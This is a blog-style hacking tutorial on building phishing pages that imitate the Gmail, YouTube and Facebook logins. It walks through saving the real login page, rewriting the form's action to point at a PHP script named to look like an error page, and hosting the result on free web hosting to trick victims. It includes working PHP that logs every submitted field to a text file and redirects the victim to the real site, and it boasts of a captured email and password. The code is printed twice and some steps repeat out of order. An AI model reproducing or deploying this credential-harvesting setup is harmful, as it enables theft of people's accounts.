Hi Hackers Today I Will Tell U How To Make Phishing
Creating Phishing Pages tutorial :
So we'll start from Google & Gmail, Faceboook, Yahoo, Twitter, & You-Tube.
Creating Phishing Page of Google, Gmail and Youtube is Same :
So, its very easy and simple.. now again back to the edited code of .html file and change action value to "Error.php" name of your PHP logger
Save it, and Finally you're done *Cheers* you created Gmail Phishing page, now we'll host on Free WebHosting services like 000webhost.com and after all you've to give link to the victim and waits until he enter his email and password, actually Phishing needs a lot of Social Engineering techniques and manipulate users to login. So m gonna test phishing page whether it is working or not! Okay m using 000webhost to host my files of WWW and testing it. and here we go! you can also downloaded already created Gmail Phishing page Click here
And here we got Email and Password :D ... Cool
Creating Facebook Phishing Page : Mostly all are same methods to create Phishing pages, here facebook is one of the most popular social networking site with billions of user, and according to 2012 Report, Facebook team said daily 500+ fb account get hacked through Phishing techniques.
Creating Phishing Page of Google, Gmail and Youtube is Same :
- Open Gmail.com login page, Hit Ctrl + S [Save it on Desktop]
- You'll get one folder with images + javascript and one .html file
- Do not touch anything in folder, let it be like that only... now open .html file with Notepad or Notepad++, and lets mess with some codes.
- If you know HTML & CSS then that code is just piece of cake for you.
- Now, all websites uses HTML form to get ID and Password, simply we just have to modify the code with some changes and connect little PHP file to the HTML form so our application can record Username and password and save it into one log file.
- Now, Search for "action" statement in the Code.
- As I told you need to know little about HTML programming, so you can understand how exactly it works and can be used to steal password.
- Okay, fine now you've to change action value with your PHP file.
- Now Just pause this tutorial here and back to desktop, now Open notepad and just write 5 lines PHP code like this :
Copy below entire code and paste it into your notepad :
--------------------------------------------------------------------------------------------------------------
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>
------------------------------------------------------------------------------------------------------------------------------------------------------
Now, Just save that entire code to desktop with downloaded files, as .PHP extension file for eg : Error.php (so your victim won't realize and he might think that it is some kind of error and didn't logged in, & he'll be redirected to real page) Also create one Blank notepad .txt file and place it at same downloaded file with the name of log.txt
- Creating fb phisher is also same as Gmail, Just replace PHP redirection page to different page.. :) and all steps are same
Soon we'll create tutorial how to create Phishing pages of Twitter and Yahoo!
Thank you for reading this post, please comment if you've any doubt and let me know your problem. Share it and increase us. :)
Post a Comment